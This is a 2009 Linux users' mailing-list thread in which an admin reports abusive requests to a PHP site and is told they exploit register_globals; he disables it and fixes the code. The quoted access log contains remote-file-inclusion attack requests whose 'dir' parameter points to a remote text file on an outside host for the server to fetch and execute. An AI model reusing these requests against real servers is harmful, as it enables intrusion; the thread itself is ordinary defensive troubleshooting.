[ale] Apache PHP redirect proxy type hack

Ben Alexander ben-ale at bensbox.com
Tue Jun 30 15:59:11 EDT 2009


Thanks, I turned off register_globals and modified the code and looks like
that will take care of this problem.

On Mon, Jun 29, 2009 at 9:09 PM, Brandon Checketts <
brandon at brandonchecketts.com> wrote:

> The request to webpage.php that returned a 200 status might or might not
> be a problem.  You should examine the PHP script and see if it is doing
> anything with the $dir variable without verifying that it is safe to use.
>
> This type of vulnerability is common in old PHP code that relies on
> register_globals being enabled.  When register_globals is enabled PHP
> will automatically set global variables with those passed in the GET or
> POST requests.  Poorly thought out PHP code will sometimes include()
> that variable blindly and cause the page to be downloaded and executed.
>
>
> Thanks,
> Brandon Checketts
>
>
>
>
> Ben Alexander wrote:
> > Every now and then some IP address from Asia or other place hits our web
> > server and is utilizing some PHP or mod_rewrite perhaps bug to proxy
> > themselves to another website perhaps and use a lot of bandwidth, but
> > only our outgoing it seems.
> >
> > Here is an example from access_log of this (members.php is not a valid
> > PHP page on the site):
> >
> > 80.93.50.112 - - [27/Jun/2009:01:35:37 -0400] "GET
> > //members.php?act=view&p=passwd&dir=http://lpkpm.com/lib/fatal1.txt????
> > HTTP/1.1" 404 16942 "-" "Mozilla/5.0" "-"
> > 80.93.50.112 - - [27/Jun/2009:01:35:39 -0400] "GET
> > /webpage.php//members.php?act=view&p=passwd&dir=
> http://lpkpm.com/lib/fatal1.txt????
> > HTTP/1.1" 200 210484729 "-" "Mozilla/5.0" "-"
> >
> > When this happens, there are hundreds of megs of log lines like this in
> > error_log:
> >
> > [Sat Jun 27 01:35:39 2009] [error] [client 80.93.50.112] PHP Warning:
> >  virtual() [<a href='function.virtual'>function.virtual</a>]: Unable to
> > include 'footer.php' - error finding URI in
> > /htdocs/website.com/webpage.php <http://website.com/webpage.php> on line
> 93
> >
> > [Sat Jun 27 01:35:39 2009] [error] [client 80.93.50.112] Request
> > exceeded the limit of 10 subrequest nesting levels due to probable
> > confguration error. Use 'LimitInternalRecursion' to increase the limit
> > if necessary. Use 'LogLevel debug' to get a backtrace.
> >
> >
> > Any idea how to prevent this?
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://mail.ale.org/pipermail/ale/attachments/20090630/2ec4b84e/attachment.html 


More information about the Ale mailing list